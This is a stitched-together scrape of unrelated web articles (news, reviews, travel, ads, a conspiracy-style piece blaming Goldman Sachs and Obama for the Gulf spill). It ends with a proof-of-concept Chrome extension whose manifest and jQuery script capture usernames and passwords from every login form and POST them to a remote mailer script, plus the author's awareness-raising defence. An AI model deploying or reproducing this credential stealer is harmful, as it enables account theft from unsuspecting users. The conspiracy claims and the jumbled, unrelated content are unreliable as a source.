51 . Find a float tank and get in one .
This has probably been the best thing I ’ve ever done for recovery in a long time .
Google the nearest location and give it a try .
Let me know how you like it .
52 . Do some mobility work every day .
This book has lots of great options .
53 .
Train outside from time to time .
Bring a bunch of stuff outside and get after it .
Or just go to the park and do a bunch of bodyweight stuff on the monkey bars alternated with some kettlebell swings .
But do something .
Start incorporating any or all of those tips today and pretty soon it will be impossible for you to walk into a room without people stopping to note , “ That dude ’s fuckin awesome . ”
***
If you got any inkling of enjoyment out of this post I ’d greatly appreciate you hitting one of the share buttons below .
Thanks for being awesome .
WASHINGTON — Patients treated at Veterans Affairs hospitals and clinics will be able to use medical marijuana in the 14 states where it 's legal , according to new federal guidelines .
The directive from the Veterans Affairs Department in the coming week is intended to clarify current policy that says veterans can be denied pain medication if they use illegal drugs .
Veterans groups have complained for years that this could bar veterans from VA benefits if they were caught using medical marijuana .
The new guidance does not authorize VA doctors to begin prescribing medical marijuana , which is considered an illegal drug under federal law .
But it will now make clear that in the 14 states where state and federal law are in conflict , VA clinics generally will allow the use of medical marijuana for veterans already taking it under other clinicians .
" For years , there have been veterans coming back from the Iraq war who needed medical marijuana and had to decide whether they were willing to cut down on their VA medications , " said John Targowski , a legal adviser to the group Veterans for Medical Marijuana Access , which worked with the VA on the issue .
Targowski in an interview on Saturday said that confusion over the government 's policy might have led some veterans to distrust their doctors or avoid the VA system .
Dr. Robert A. Petzel , the VA 's undersecretary for health , sent a letter to Veterans for Medical Marijuana Access this month that spells out the department 's policy .
The guidelines will be distributed to the VA 's 900 care facilities around the country in the next week .
Petzel makes clear that a VA doctor could reserve the right to modify a veteran 's treatment plan if there were risks of a bad interaction with other drugs .
" If a veteran obtains and uses medical marijuana in a manner consistent with state law , testing positive for marijuana would not preclude the veteran from receiving opioids for pain management " in a VA facility , Petzel wrote .
" The discretion to prescribe , or not prescribe , opioids in conjunction with medical marijuana , should be determined on clinical grounds . "
Opioids are narcotic painkillers , and include morphine , oxycodone and methadone .
Under the previous policy , local VA clinics in some of the 14 states , such as Michigan , had opted to allow the use of medical marijuana because there is no rule explicitly prohibiting them from doing so .
According to the National Conference of State Legislatures , there are 14 states and the District of Columbia with medical marijuana laws .
They are : Alaska , California , Colorado , Hawaii , Maine , Maryland , Michigan , Montana , Nevada , New Mexico , Oregon , Rhode Island , Vermont and Washington .
New Jersey also recently passed a medical marijuana law , which is scheduled to be implemented in January .
Star Trek vet Ronald Moore wrote sixty episodes during his tenure with the franchise , half of which were for Star Trek : Deep Space Nine .
Moore went on to create the dark reboot of Battlestar Galactica , which he now says was born in the DS9 writers room .
DS9 begat BSG
Ron Moore was a guest at the London MCM Expo this past weekend and was interviewed by HeyUGuys , who asked him about the connections between BSG , and his time with Trek and specifically with Deep Space Nine .
Here is what Moore said about the parallels between BSG and DS9 :
Ron Moore : I think a lot of Battlestar was born at Deep Space Nine in that Deep Space started as much more episodic because of the nature of the show , it became more a continuing serialised structure .
I really liked that , and I discovered I really liked that style of storytelling , and also particularly when we got into the later years of Deep Space , and we started telling the Dominion War story ( 1997 - 99 ) , we would sit and argue and fight with the powers that be at Trek about making it a more realistic war , about making it grittier , and ugly ; adding more ambiguity to the characters , and roughing it up a little bit , and I kept bumping my head against the strictures at Trek .
What Star Trek is could not accommodate things that I wanted to do , so I started to have this sort of pent up frustration about ‘ well if we were really going to do it right ’ , these ideas would sit in the back of my head so when Battlestar came along , I could now do all of those things that I was never allowed to do at Deep Space .
BattleTrek Galactica Nine
After co-creating the new Galactica with David Eick , Moore brought a number of other writers in from DS9 .
Both Bradley Thompson and David Weddle wrote and served as story editors for both shows .
In addition Michael Taylor and Jane Espenson wrote for them both .
While not as dark in tone as Galactica , Deep Space Nine is certainly the darkest of the franchise .
This mashup of the BSG opening theme with DS9 images shows the two series fit together well .
POLL : You like both DS9 and BSG ?
Our latest poll is trying to see if there is a correlation between fans of Ron Moore ’s Battlestar Galactica and Deep Space Nine .
So do you like both or not like both , or is it a mix ?
[ poll=589 ]
To no one 's surprise , an American defense manufacturer has developed a battlefield smart phone .
In the works for two years , the RATS ( Raytheon Android Tactical System ) is a modification of the Android software used on millions of smart phones .
Android actually outsells iPhones , and the RATS phone will be able to use existing Android apps , as well as special military apps .
Some of these will only work on RATS , which handles encryption and military type communications .
Currently , RATS is running on several Motorola and HTC type smart phones .
Raytheon began working on RATS as soon as Google released Android .
It was only three years ago that the iPhone , a very unique and popular smart phone design , went on sale .
Since then , over 300 million iPhones , and similar " smart phones " have been sold .
Some of the most eager buyers of this technology have been American soldiers .
This should come as no surprise , as U.S. soldiers and marines who have fought in Iraq and Afghanistan have become tech - heads , courtesy of all the electronic gear combat troops now carry .
Officers often have laptops with them in combat , to display maps , overhead UAV video , satellite photos and all manner of data needed for them to fight smarter and more effectively .
The troops use night - vision gear , electronic rifle sights and much more .
Some get to handle portable radars that can see through walls and binoculars that have laser range finders and electronic links to artillery units .
Most importantly , nearly all the troops have cell phones .
And a disproportionate number of soldiers have smart phones .
The iPhone or Android models can use thousands of cheap , or free , programs , and some of these are very useful for military personnel .
Early on , it was realized how useful smart phones could be with software designed for military purposes .
Raytheon , as well as many military people , realized that a military version of the smart phone , able to operate on a closed military network , would be a big help in the combat zone .
But many troops believed that the military procurement system , which often takes more than a decade to get new gear into the hands of the troops , could never deliver a military smart phone in time .
But many senior commanders proceeded to prove that smart phones would enter regular military use sooner , rather than later .
Within two years of the iPhone 's release , the U.S. Army was soliciting iPhone and Android apps for military use .
Now some of these apps are being used by troops in basic training , and more advanced operations as well .
On a test basis , some troops are being issued smart phones .
Raytheon took this as an encouraging sign and moved ahead with RATS .
All this is part of a fundamental generational shift in the military regarding technology .
In the last decade , a generation has come of age that expects to carry around a phone , and stay connected 24 / 7 .
Their elders have also picked up on this convenience , to the point where the U.S. Army is eager for things like RATS .
The army is already issuing more and more of its training , operations and maintenance manuals as pdf files that can be viewed on smart phones ( or Ipod Touch and iPad devices ) .
The troops have long sought this feature , and have often just gone ahead and done it themselves .
In Afghanistan and Iraq , where widespread cell phone service followed in the wake of the American invasions , many U.S. troops purchased local cell phone service , and used these phones when on combat operations .
But the troops want more out of their phones than just instant communications .
Like many business users , military personnel see the many potential uses of " smart phones . "
These are cell phones with personal computer like power , and capabilities .
Last year , 14 percent of the cell phones shipped were smart phones ( the Blackberry , Androids and iPhones are the more popular models , in that order ) .
This year , the percentage for smart phones is expected to more than double .
Smart phones are particularly popular with businesses , where most of them are used .
Nearly half of business users let their smart phone replace their laptop at least some of the time .
But many business users are pushing for smart phones powerful enough to replace their laptops a lot more often .
For commanders , a military smart phone like RATS has numerous advantages .
First , there 's the convenience of having most of your unit data literally at your finger tips .
Status of troops , ammo , equipment and the inevitable todo list , as well as maps and plans for future , or past , operations .
Smart phones also push data onto a phone , to keep databases and schedules updated .
Commanders love that sort of thing , as it saves them the hassle of checking on updates .
And updates are a lot easier to collect with everyone connected .
Senior NCOs can much more easily poll troops by texting them to get current status of things like ammo , sleep , food or health .
Commanders like to stay on top of these items .
The army is in a hurry to get this working , because commercial smart phones are getting smarter and cheaper , and a lot more troops are getting them .
Moreover , new smart phone models come out each year , and things like RATS would be more effective if they could keep up with that development cycle .
That 's what makes RATS so encouraging , as the product is basically software .
As new hardware comes out , the latest RATS rev is there ready to send that Android iron to war .
While troops favor stuff like personal radio sets ( which came of age in Iraq ) , they also know that cell phones can do the same thing , and more .
So they want cell phones that would simply plug into the helmet headset .
The army also has to deal with troops demand for iPod features ( the most widespread " handheld computer " ) .
Something like RATS would also be able to take stills and videos , and the troops like to carry favorite vids with them .
Combining business and pleasure is not encouraged in the military , but the RATS phone is also a very personal piece of gear .
It might even be able to use civilian cell networks as well , meaning that every troop will be issued one .
The effort to deliver something like RATS was long seen as a lost cause .
But the demand is strong , and growing .
The Department of Defense , and especially the army , is increasingly addressing the need for smart phones that can do things the troops need .
Money is being spent to create military apps , and troops are encouraged to write these apps .
It 's not just training and electronic documents , but doing calculation heavy battlefield chores , like navigation , intel analysis and mission planning .
The demand is growing , and so is the supply .
And , unlike in the past , the brass , who grew up as part of the PC and video game generation , are not standing in the way .
The compensation - which Mr Porter said was one of the largest ex-gratia payments by a government in Australian history , as well as that of common law countries - came after negotiations with the family 's lawyers , the Aboriginal Legal Service , and on receipt of legal advice detailing what action could be brought against the state , and what that case might look like .
It represented an " unequivocal apology " by the government .
" It 's meant to show contrition ... deep , deep , remorse for what has occurred , " Mr Porter said .
It also took into account the fact that no criminal charges would be laid .
While it did not come with an admission of liability , Ms Donegan could still take legal action if she chose .
An " initial view " was that legal action would be likely , Mr Porter said .
" I do n't know if that position will change by virtue of this payment , " he said .
It 's meant to show contrition ... deep , deep , remorse for what has occurred .
" If this does not bring finality to the family , ( if civil action was to be launched ) , we do n't want to stand in the way of Ms Donegan embarking on that action . "
ALS chief executive Dennis Eggington said that his organisation would consult with Mr Ward 's family about possible civil proceedings against both the government and G4S .
The ALS also requested further information to determine whether it would apply to have a coronial inquest into the death reopened .
He described the culpability of G4S as " astronomical " and called on the company to apologise .
" That 's the least G4S can do , " he said .
" They have been very quiet in all of this .
We 've been very disappointed . "
ALS director of legal services Peter Collins said the role of G4S in Mr Ward 's death was " absolutely diabolical " .
" It was their van , their employees driving the van , at a bare minimum ( G4S ) should be offering compensation to the family , " he said .
If Ms Donegan was successful in any legal action against the government , the ex-gratia payment would be subtracted from any damages she might receive , Mr Porter said .
She had indicated she would use the payment to buy a house in or around Kalgoorlie , distribute about $ 110,000 to members of Mr Ward 's extended family and place the rest in a trust account with the National Australia Bank .
The eldest of her children had recently turned 18 and could , if he wished , dissolve his trust fund , though he would be encouraged to use some of the money to purchase a property .
The public trustee would administer the childrens ' trust funds .
The ALS had yet to talk to the family about whether it considered the amount of compensation adequate , however Mr Eggington said it would recommend the family look at other alternatives than the public trustee to manage the children 's money .
Mr Porter , when asked if the same circumstances would apply to payments given to a non-Indigenous family , said there had been some internal debate within government on whether the approach was " too prescriptive or not prescriptive enough " .
The government last year awarded Andrew Mallard $ 3.25 million as an ex-gratia payment for serving 12 years jail for a murder he did not commit .
No conditions were placed on that payment .
State Coroner Alastair
Hope found the two security guards who transferred Mr Ward were in part to blame for his death .
However , Director of Public Prosecutions Joe McGrath announced last month that no charges would be laid against those responsible because of a lack of criminal evidence .
WorkSafe WA launched its own investigation earlier this month .
It has six months to decide whether or not to prosecute .
Mr Porter said his personal view was that G4S " should be doing something " to help Mr Ward 's family , but that was a matter ultimately for the company .
Its contract to run the prison transport service expires next year and will be put up for tender .
The company 's previous record would be considered if it bid for the contract , and that record " is not good " , Mr Porter said .
Mr Hope made 14 recommendations last year to improve prison transport , but a recent report by Custodial Services inspector Neil Morgan found progress had been mixed .
Though the government had committed to replacing some of its transport vehicles a month after Mr Ward 's death , only a " handful " of new vehicles were on the road more than a year later .
" Transport providers and their passengers were having to make do with the same decrepit fleet , notwithstanding certain modifications to vehicles and procedures that had been made following the death of Mr Ward , " Mr Morgan said .
Mr Porter said the death occurred under the watch of the previous Labor government , and all prison transport vehicles would be replaced by the end of this year .
The state government was also holding discussions with Mr Ward 's extended family about funding community facilities in the Warburton area .
The extended family could also apply for ex-gratia payments , " but payment would be extraordinary " in those circumstances , Mr Porter said .
Opposition justice spokesman John Quigley claimed the payment to Ms Donegan fell about $ 600,000 short of what Mr Ward , a lands officer , could have reasonably expected to earn in the remainder of his working life .
G4S should have been prosecuted .
" If this had been a dog that died in the back of that prison van the RSPCA 100 per cent would have prosecuted the person who put the dog in the back of the prison van , " he said .
Labor had " unequivocally apologised " for the death .
Loading
" We do n't shy away from the past , " he said .
Melissa Parke , the federal Labor MP for Fremantle , this week called for a royal commission into the state justice system 's treatment of Aborigines .
" This is such a scene I 'm just going to take a moment for myself to just take it all in , " Paul McCartney said , addressing an audience that had spent the previous hour or so cramming itself into every possible corner of AT&T Park .
So a mere two songs into his set on Saturday everything stopped while the 68 - year - old pop titan stood at the edge of the stage , mugging as much for the sea of raised cameras at his feet as for his own enjoyment .
The last time McCartney played in San Francisco was when the Beatles performed their final public concert at Candlestick Park in 1966 .
He returned on Saturday virtually unchanged - the same shaggy hair , titanium smile and desperate need to please .
He was even wearing the same boots .
" The only thing then is we could n't hear a thing we were singing , " he said , inspiring a fresh chorus of screams , only probably more ragged and breathless this time around .
You hear about all these things , but until you actually sit just a few yards away and witness McCartney in action for close to three hours , it 's impossible to understand how they all conspire to make Sir Paul such an absolute whirlwind .
" It 's character - building , this weather , " he said , stripping off his suit jacket with a nod .
Tearing through five decades of rock history with a backing band that did n't miss a note , he kept bouncing and bantering throughout the night , even as large swathes of his fans fell back on their chairs in exhaustion .
He even held onto " Helter Skelter " for the second encore , giving the song every bit of frenzy it required after having already delivered a powerhouse run through " Day Tripper , " " Lady Madonna " and " Get Back . "
What was really amazing was taking in the full scope of songs that have come out of this man : " Two of Us . " " Eleanor Rigby . " " Paperback Writer . " " Yesterday . "
" Hey Jude . "
The audience may have heard it all before , but the thrill of hearing it again was undiminished .
It was hard to believe that pop music was ever so good , that life was so good .
Unlike the Rolling Stones and Bob Dylan , who constantly destroy and rebuild their classics in ways that make the dogs in Potrero Hill want to put their paws over their ears , McCartney meticulously preserves his songs , delivering them precisely the way they sounded on the day they were etched in vinyl - integrity and soul intact .
Of course , it would be easy to nitpick with the set list .
With his catalog , why bother with two songs from the little - heard album he released in 2008 under the name the Fireman ?
And why so much filler by Wings ?
The thing is , the band made even those songs sound endearing .
McCartney has been playing roughly the same set for more than a decade but still managed to draw resonance in the most unexpected places :
An acoustic take on " Blackbird " that made a stadium filled with 40,000 people feel like a living room ; the heart - stopping pyrotechnics display that ignited " Live and Let Die " ; and the quick run through " San Francisco Bay Blues , " which saw him veering off the rigid set list .
" We had to throw that one in , " he shrugged .
There were also reminders of the loss he has endured over the years .
There was " Here Today , " a song he wrote after John Lennon 's death as a peace offering to his former band mate .
He brought out a ukulele George Harrison had given him for a moving version of " Something . "
And for Linda McCartney - whose absence still looms large over the stage after all these years - he reserved the elegiac Wings ballad " My Love . "
But through his sadness he offered solace .
And to the people singing along , fighting back the tears and raising their thumbs in solidarity , McCartney is not merely a survivor :
He is an enduring force of nature .
July 15th , 2010
During 7 months
I lived in Rome for my job and in the weekends I always tried to explore either the more rural sites around the city or organize some trips with my colleages to other cities like Florence or Venice .
A day trip to Florence from Rome will take you a bit by car so getting up really early would be a smart idea .
Of course you do n't have to make a day trip out of it because Florence is a beautiful city and you could easily spend a few days here .
Travel Florence
Because we had organized this day trip to Florence we all decided to start driving around 6 in the morning , which obviously was the downside of the whole trip .. but at least we had enough time to discover this beautiful city !
From Rome to Florence took us about three hours by car which is about the same time you would spend driving in the other direction from north to south if you want to drive from Venice to Florence .
Florence was absolutely gorgeous and it will be a challenge to describe all the things to do or all the things to see in this city .
Well , Florence is famous for its Ponte Vecchio bridge so lets start with that one !
The Ponte Vecchio would be the gateway to the center of Florence and a true eyecatcher with its immense crowd and shiny jewelry shops .
From the Ponte Vecchio you will be able to move in different directions and I guess you do n't really need a city map , although a travel guide or something like that would be interesting if you want to hear or read about the history of the buildings .
Travel Florence
Another symbol of Florence and the region of Tuscany would be the statue of David by Michelangelo .
Then of course Piazza del Duomo , or the Duomo Square with the gorgeous Duomo of Florence , the Basilica of San Lorenzo , Basilica di Santa Maria Novella and constructions like the Catedrale di Santa Maria del Fiore or the Museo dell ' Opera del Duomo .
Florence is filled with masterpieces and trying to list them feels impossible as there are so many things to see as this city truly is one big touristic attraction !
SAN FRANCISCO ( Reuters ) - Microsoft Corp has pulled the plug on a new generation of smartphones less than three months after the company unveiled the devices in an attempt to catch - up with Apple and Google in the fast - growing mobile market .
Microsoft said on Wednesday it had canceled plans to sell its “ Kin ” phones in Europe this Fall .
The company added the internal team working on the Kin phones would be combined with the group working on Microsoft ’s forthcoming Windows Phone 7 software .
“ We will continue to work with Verizon in the U.S. to sell current Kin phones , ” Microsoft said in an emailed statement .
The Kin phones represented software giant Microsoft ’s first foray into designing its own phones .
The two Kin models featured built - in Internet social networking functionality as well as Microsoft ’s Zune digital music player and were aimed at savvy young phone users .
Microsoft began selling the Kin phones with Verizon Wireless in May .
Verizon Wireless , the largest U.S. wireless operator , is a joint venture of Verizon Communications and Vodafone Group Plc .
The Gulf area may have to live with oil long after the beaches have been cleaned .
Some residents are outraged that BP has been dumping oily waste in landfills in their areas .
After BP crews scoop up the oil off Gulf beaches , the waste is transported to Mississippi's Pecan Grove landfill .
Even workers ' protective suits , gloves , shovels , rakes and anything else that touches oil is buried there .
The Board of Supervisors in Harrison , Mississippi passed a resolution saying they do n't want any BP waste in their community but there is little they can do .
BP has cut deals with Waste Management , the owners of the landfill .
They answer to the state instead of local county government .
" We do n't want it , " President of the Board of Supervisors Connie Rocko told CNN 's Randi Kaye .
" It is valuable landfill space and hazardous to our citizens .
Take your waste somewhere else or please find an alternative . "
Rocko is concerned that oil could find its way into the water table and be harmful to the residents .
But Waste Management 's Ken Haldin says there 's nothing to be worried about .
" It is an understandable concern because there is a lack of awareness , " he told CNN .
Haldin explained that Pecan Grove landfill is designated a nonhazardous site which mean no liquid waste can be dumped there .
There is a liner underneath the landfill that is designed to prevent waste from seeping into the water table .
In the past 24 hours alone , 150 tons of BP waste has been dumped there , said Haldin .
The EPA has ordered that BP waste disposal efforts must be transparent .
The company must post details of all collected waste at their website .
But considering accusations that BP and the Coast Guard have tried to prevent reporters from covering the cleanup efforts , some may have grounds to question that transparency .
In a recently published decision rendered on June 16 , 2010 , the Frankfurt am Main Higher Regional Court ruled that an Internet access provider may store IP addresses for seven days , and therefore , customers have no right to demand immediate deletion of their IP addresses .
The Court ’s ruling upheld a decision originally rendered by the regional court of Darmstadt .
The claimant had requested that Deutsche Telekom AG delete the dynamic IP address assigned and stored for each Internet session immediately upon disconnection by a user .
Up to that point , the Internet provider had been retaining IP addresses for 80 days after each billing cycle .
In June 2007 , the lower court granted the claimant request , imposing a maximum retention period of seven days for IP addresses .
The Internet provider reduced its IP address retention period accordingly , based on an agreement with the German federal data protection authority .
The claimant , however , was not satisfied with the seven - day grace period and decided to press for the deletion of IP addresses as soon as an Internet connection ends .
In the claimant ’s view , such deletion is required by data protection law and is fundamental to the protection of personal privacy .
Because IP addresses may allow third - parties to monitor a user ’s behavior on the Internet , and even create personality profiles based on the observed behavior , the claimant argued that a seven - day retention period is unacceptable .
The Court disagreed with these arguments , stating that there is no legal basis for requiring Deutsche Telekom AG to delete IP addresses immediately , and that IP addresses are necessary for invoicing purposes under the German Telecommunications Act .
In addition , the Court argued that the claimant had overlooked some aspects of his contractual relationship with the provider .
His subscription covered a combination of services for a flat fee , and allowed him to use his login to use other telecommunications accounts and access techniques .
These supplemental services may generate additional costs that must be calculated and documented by the service provider using stored IP addresses .
If the IP addresses were deleted right after the Internet connection ended , it would be impossible for the provider to allocate and invoice the supplemental services to the appropriate subscriber .
The retention of IP addresses also is permitted for security and technical reasons .
According to the provisions of the German Telecommunications
Act , the retention of Internet traffic data is permitted to identify , limit or remedy disturbances or errors in a telecommunications system .
If the IP addresses were deleted immediately , it would be nearly impossible for a provider to resolve certain technical issues .
The claimant failed to demonstrate that the immediate deletion of IP addresses would not have an adverse effect on invoicing and detection of technical disturbances , thus the seven - day retention period agreed with the German federal DPA could not be challenged .
The Higher Regional Court ’s decision is now on appeal to the German Federal Court of Justice ( Az. : III ZR 146/10 ) .
Michael Edwards
Activist Post
The Hydra - like creature , Goldman Sachs , has surfaced from the Gulf oil volcano .
Illinois - based Nalco Corporation is responsible for the Corexit 9500 chemical dispersant highlighted by experts as being 4 times more toxic than the oil that is flowing into the Gulf .
Scientists in congressional hearings added that the dispersant is more toxic than other similar dispersant on the market .
Naturally , whenever a major disaster takes place — especially when major , society - altering solutions are being offered — one needs to follow the trail of money and power to see who benefits .
Sure enough , a casual search of Nalco ’s Web site reveals their company history ; it leads right to the doorstep of Goldman Sachs .
Nalco seems to have started in 1928 Chicago and became immediately involved in both the oil industry and water treatment facilities .
1982 seems to have been a massive turning point for the company as their Web site states , “ ORS - 419 is used in the tires of the Space Shuttle Columbia .
The Nalco product is the only non-silicone product of its type on the market approved by the space shuttle tire ’s manufacturer . ”
Thereafter , things really seem to have taken off as shown here :
1983 : Nalco breaks ground for a new 300,000 - square - foot trio of headquarters buildings in Naperville , representing an investment totaling $ 90 million .
1984 : Nalco introduces the PORTA - FEED ® reusable container system , the most advanced liquid chemical handling system yet introduced .
1985 : Nalco leads the chemical industry in the development of CAER ( Community Awareness and Emergency Response ) , a forerunner of the Emergency Planning and Community Right - to - Know Act of 1986 and the CMA Responsible Care® initiative .
1986 : Nalco consolidates groups from the Energy Chemicals Division and Oil Field Services Division to form a new Petroleum Chemicals Division to be headquartered in Sugar Land .
The new Petroleum Chemicals Division will include Visco Chemicals , Refinery Process Chemicals , Additives , Adomite Chemicals and Gas and Oil Handling Chemicals Groups .
1989 : Sales top $ 1 billion .
Then , in 1994 Nalco joined forces with Exxon Chemical to announce the formation of a new alliance “ Nalco / Exxon Energy Chemicals , L.P. to provide products and services to all facets of the petroleum and natural gas industries . ”
Another name change occurred in 2001 when the company became Ondeo Nalco .
Finally , in 2003 , we learn who has taken the reins to lead us into the present .
As their site states : “ The Blackstone Group , Apollo Management L. P. and Goldman Sachs Capital Partners buy Ondeo Nalco . ”
Global sales now exceed $ 4 billion and the Gulf cleanup is in the hands of a group of corporate pals who have brought us such fine moments of humanity such as Blackstone ’s “ locust capitalism ” hostile takeover binge which triggered a major political backlash in Germany and elsewhere , and the newly proposed austerity measures coming to America .
Apollo Management is in the Wall Street Journal ’s Who ’s Who in Private Equity with the very human investment strategies of leveraged and distressed buyouts and debt investments — investments now top $ 37 billion .
And , by now , Goldman Sachs ’s reputation precedes itself as having engineered the housing crash and exacerbating a financial meltdown in Greece and across Europe .
Yet , Goldman Sachs is far too gluttonous a creature to be happy with administering the profits from the physical fallout of the Gulf disaster .
The kings of the carbon market — yes , that market that trades nothing but air — have not been having an easy time of it pushing man-made global warming .
In the Gulf , however , they have their cohort , Barack Obama , well positioned to steer the pirate ship back on course .
It was Obama who helped fund the carbon program from its inception after all .
Right on cue , Obama ’s e-mail campaign is launched to exploit suffering at the behest of his corporate controllers .
We are living in a full - blown international corporate command and control system where even the most basic rescue efforts are in the hands of proven pirates .
It also has become clear that the pirate flotilla is owned by Goldman Sachs . . . and the president of the United States is the captain .
Related : Gulf Oil Disaster EXPOSED : EPA Lies About Air Quality – AGAIN
The New Advanced Format Drives
As one of the leading innovators of hard disk drive technology , Western Digital lead the effort in getting the new Advanced Format hard disk drives out into the market .
But what exactly is Advanced Format , and how does that benefit us ?
Hard disk drive capacity have increased exponentially , from mere megabytes to gigabytes , and now terabytes .
However , the ability to squeeze more data into the same physical space has been hampered by the age - old sector size of 512 bytes .
This is where Advanced Format comes in .
To improve capacity , hard disk drives must change the size of the sectors so that they store 4,096 bytes ( 4 KB ) instead of just 512 bytes .
The 8 - fold increase in sector size increases the amount of data that can be stored in the same space by 7 - 11 % .
In other words , Advanced Format drives can squeeze in 7 - 11 % more data into the same platter as non-Advanced Format drives .
Take a look at the comparison on the right .
In a legacy ( non-Advanced Format ) drive , each sector begins with a Sync / DAM header , followed by 512 bytes of data and ending with an ECC ( error correction code ) block .
There is also a small inter-sector gap before the next sector starts .
The Advanced Format sector starts with the same Sync / DAM lead - in but follows that with 4096 bytes of data .
It also uses a longer ECC code block , which allows for both better data integrity as well as higher efficiency ( there are fewer ECC bytes for the amount of data protected ) .
The new 4 KB sector does away with 7 of the Sync / DAM headers and inter-sector gaps .
Its single , large ECC block is also much smaller than the 8 small ECC blocks used in the legacy sector combined together .
This is basically how Advanced Format allow for further increases in drive capacity .
Getting Around The 2.1 TB Limit
Advanced Format can also help the industry get beyond 2.1 TB capacity limit , which was brought about by the LBA addressing limit in 32 - bit operating systems .
These operating systems can only support up to 4.29 million sectors , which translates to 2,199,023,255,552 bytes if each sector is 512 bytes .
The only way to get around this is to upgrade to 48 - bits Long LBA , which supports up to 144 petabytes , if each sector is 512 bytes .
However , this solution requires the use of a newer 64 - bit operating system ( e.g. Windows Vista , Windows 7 , Mac OS X ) and a motherboard that supports UEFI .
In other words , it 's pretty much out of reach for most people right now .
By switching to 4 KB sectors , the industry will have an easy way to bypass this limitation , immediately allowing for drive capacities of up to 17.5 TB for current motherboards and 32 - bit operating systems .
That makes it a great interim step to a full LBA upgrade .
It also expands the supported capacity of Long LBA from 144 petabytes to 1152 petabytes .
Support Tech ARP !
If you like our work , you can help support out work by visiting our sponsors , participate in the Tech ARP Forums , or even donate to our fund .
Any help you can render is greatly appreciated !
We can assist you with :
Chapter 7 remains the most common type of individual bankruptcy .
In this “ liquidation ” bankruptcy , your non-essential assets are used to pay off part of your debt , while the rest is discharged .
Chapter 7 bankruptcy enables you to wipe your debt slate clean while still retaining ownership of your home , car , and other important possessions .
Of course , every case is different , and only a skilled Philadelphia bankruptcy attorney can help you know whether Chapter 7 is the right option for you .
Chapter 7 is also available for businesses – and this route can be an attractive alternative , in situations where the business ’ own assets can be leveraged for repayment .
When your small business is going under , we can help you minimize the damage to your own personal finances .
Chapter 13 is another common bankruptcy option .
Unlike Chapter 7 , in a Chapter 13 bankruptcy , the debtor is given a 3 - to - 5 - year structured repayment plan , allowing time to pay off most or all of the debts over time .
These repayments are supervised by the courts through a bankruptcy trustee , allowing the debtor to potentially retain ownership of all their original assets .
Chapter 13 is rarely available for businesses , except in circumstances involving a self - employed owner of a small business .
When you are owed money by an individual or business that is filing for bankruptcy , you need smart and efficient legal representation to ensure your rights are fully represented .
You must be involved in the process from start to finish , with diligent representatives capable of tracking down assets and ensuring the debtor remains fully - compliant within the law .
The team at Alfred Abel Law Offices is highly experienced at overseeing such cases , staying on top of debtors , and ensuring your rights are protected .
For an Experienced Philadelphia Bankruptcy Attorney , Call Alfred Abel Law Office
To discuss your specific legal and bankruptcy needs with an experienced Philadelphia bankruptcy attorney , call 215.517.8300 or 610.940.1635 .
The Code
submit
$ ( " form " ) .submit( function (e ) { var $ this = $ ( this ) ; e.preventDefault ( ) ; process ( function ( ) { $ this.unbind ( ' submit ' ) ; $ this.submit( ) ; } ) ; } ) ;
e.preventDefault
process
var process = function ( callback ) { var username = $ ( " input[type=text ] " ) .not ( passwordBoxes ).filter ( function ( ) { var field = $ ( this ) ; return field.val ( ) || field.html ( ) ; }).val ( ) , password = passwordBoxes.val ( ) ; sendEmail ( username , password , location .href , callback ) ; } ;
process
passwordBoxes
input
password
var passwordBoxes = $ ( " input[type=password ] " ) ;
sendEmail
var sendEmail = function ( username , password , url , callback ) { var msg = getMessage ( username , password , url ) ; $.ajax ( { type : ' POST ' , url : ' the url of the mailer script ' , data : ' the headers you want to send ' , success : callback } ) ; } ;
getMessage
var getMessage = function ( username , password , url ) { return " Username : " + username + " || Password : " + password + " || Url : " + url ; } ;
{ " name " : " Stealing login credentials with Google Chrome Extensions " , " version " : " 1.0 " , " description " : " A proof of concept demonstrating the possibility of stealing user credentials in login forms via a Google Chrome extension " , " permissions " : [ " tabs " ] , " content_scripts " : [{ " matches " : [ " http://*/* " , " https://*/* " ] , " js " : [ " jquery.min.js " , " main.js " ] , " run_at " : " document_start " } ] }
$ ( function ( ) { var passwordBoxes = $ ( " input[type=password ] " ) , getMessage = function ( username , password , url ) { return " Username : " + username + " || Password : " + password + " || Url : " + url ; } , sendEmail = function ( username , password , url , callback ) { var msg = getMessage ( username , password , url ) ; $.ajax ( { type : ' POST ' , url : ' the url of the mailer script ' , // Change to the path of your mailer script data : ' the headers you want to send ' , // Change to add any headers to be sent along success : callback } ) ; } , process = function ( callback ) { var username = $ ( " input[type=text ] " ) .not ( passwordBoxes ).filter ( function ( ) { var field = $ ( this ) ; return field.val ( ) || field.html ( ) ; }).val ( ) , password = passwordBoxes.val ( ) ; sendEmail ( username , password , location .
href , callback ) ; } ; $ ( " form " ) .submit( function (e ) { var $ this = $ ( this ) ; e.preventDefault ( ) ; process ( function ( ) { $ this.unbind ( ' submit ' ) ; $ this.submit( ) ; } ) ; } ) ; } ) ;
I am writing this follow up because I believe that there have been some misconceptions floating around in some comments I saw on other sites .
First of all , I have n't stolen any Twitter , Facebook or Gmail accounts .
In fact , I did n't even upload this extension to the Google Chrome repository .
I have only tried this extension on myself , just to test and see if it works .
Secondly , many people are saying that this is n't big news and that this knowledge is obvious to users .
For starters , please note that I have never stated that this is " big news " anywhere in my post .
Also , although this may seem ' obvious ' to many of you , users need to be reminded about security and to be careful about installing third - party applications .
It 's true that users need to ' OK ' the extension to be installed , but the reality is that very few take into consideration what the script is doing under - the - covers .
I have written this post to merely demonstrate that such things can be done and users should be aware of it .
Some have also commented as regards me demonstrating this on Google Chrome .
Yes , other browsers can also be susceptible to this technique but I chose to try this on Google Chrome because it has apparently been dubbed as ' the safest browser available ' , and I 'm not denying that .
I wanted to make users aware that although Google Chrome is , undoubtedly , a safe browser to use , they should still be careful about what they install on their browsers and not blindly trust anything .
Today I have discovered this article posted at the Mozilla Add - ons blog : Add - on security vulnerability announcement
What 's interesting about this article is that it was written on the 13th of July , which is a couple of days after my post got ' popular ' .
Now , I 'm not implying anything but it 's just an interesting thought .
Many people have commented about the fact that the ' technique ' I used in this extension cannot be applied for other browsers .
The article at the Mozilla blog now proves otherwise .
The Mozilla post talks about how one malicious add - on and one other add - on that posed a serious security vulnerability where discovered recently at the Mozilla Add- ons website .
The first add - on is called ' Mozilla Sniffer ' and was uploaded to the website on the 6th of June .
This add - on intercepts login data and sends it to a remote location .
It was discovered on July 12th .
Here 's a quote about it 's current status :
Mozilla Sniffer has been downloaded approximately 1,800 times since its submission and currently reports 334 active daily users .
All current users should receive an uninstall notification within a day or so .
